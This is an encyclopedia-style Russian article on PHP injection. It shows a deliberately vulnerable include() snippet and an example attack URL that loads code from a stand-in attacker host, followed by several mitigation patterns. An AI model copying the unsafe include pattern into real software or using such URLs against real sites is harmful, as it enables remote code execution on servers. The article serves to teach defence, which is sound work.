# PHP-инъекция
PHP-инъекция (англ. PHP injection) — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне.
Потенциально опасными функциями являются:
- eval(),
- preg_replace() (с модификатором «e»),
- require_once(),
- include_once(),
- include(),
- require(),
- create_function().

PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

## Пример
```
<?

...

$module
 
=
 
$_GET
[
'module'
];

include
 
(
$module
.
'.php'
);

...

?>

```

Этот скрипт уязвим, так как к содержимому переменной $module просто прибавляется «.php» и по полученному пути подключается файл.
Взломщик может на своём сайте создать файл, содержащий PHP-код (http://hackersite.com/inc.php), и зайдя на сайт по ссылке вроде
http://mysite.com/index.php?module=http://hackersite.com/inc
выполнить любые PHP-команды.

## Способы защиты
Существует несколько способов защиты от такой атаки:
- Проверять, не содержит ли переменная $module посторонние символы:

```
<?

...

$module
 
=
 
$_GET
[
'module'
];

if
 
(
strpbrk
(
$module
,
 
'.?/:'
))
 
die
(
'Blocked'
);

include
 
$module
.
 
'.php'
;

...

?>

```

- Проверять, что $module присвоено одно из допустимых значений:

```
<?

...

$module
 
=
 
$_GET
[
'module'
];

$arr
 
=
 
array
(
'main'
,
 
'about'
,
 
'links'
,
 
'forum'
);

if
 
(
!
in_array
(
$module
,
$arr
))
 
$module
 
=
 
$arr
[
0
];

include
 
$module
 
.
 
'.php'
;

...

?>

```

Этот способ является более эффективным, красивым и аккуратным.
- Прописать каждое значение через if

```
<?

...

$module
 
=
 
$_GET
[
'module'
];

if
 
(
$module
 
==
 
'main'
)
 
include
 
'main.php'
;

if
 
(
$module
 
==
 
'about'
)
 
include
 
'about.php'
;

if
 
(
$module
 
==
 
'links'
)
 
include
 
'links.php'
;

if
 
(
$module
 
==
 
'forum'
)
 
include
 
'forum.php'
;

...

?>

```

- Использовать оператор switch:

```
<?

...

$module
 
=
 
$_GET
[
'module'
];

switch
(
$module
){

case
 
'about'
:

case
 
'links'
:

case
 
'forum'
:
 
    
include
 
"
{
$module
}
.php"
;
 
break
;

default
:
 
include
 
'main.php'
;

}

...

?>

```

Это решение аналогично решению с if, но имеет более компактную запись.
PHP предоставляет также возможность отключения использования удаленных файлов, это реализуется путём изменения значения опции allow_url_fopen  на Off в файле конфигурации сервера php.ini.
Описанная уязвимость представляет высокую опасность для сайта и авторам PHP-скриптов не надо забывать про неё.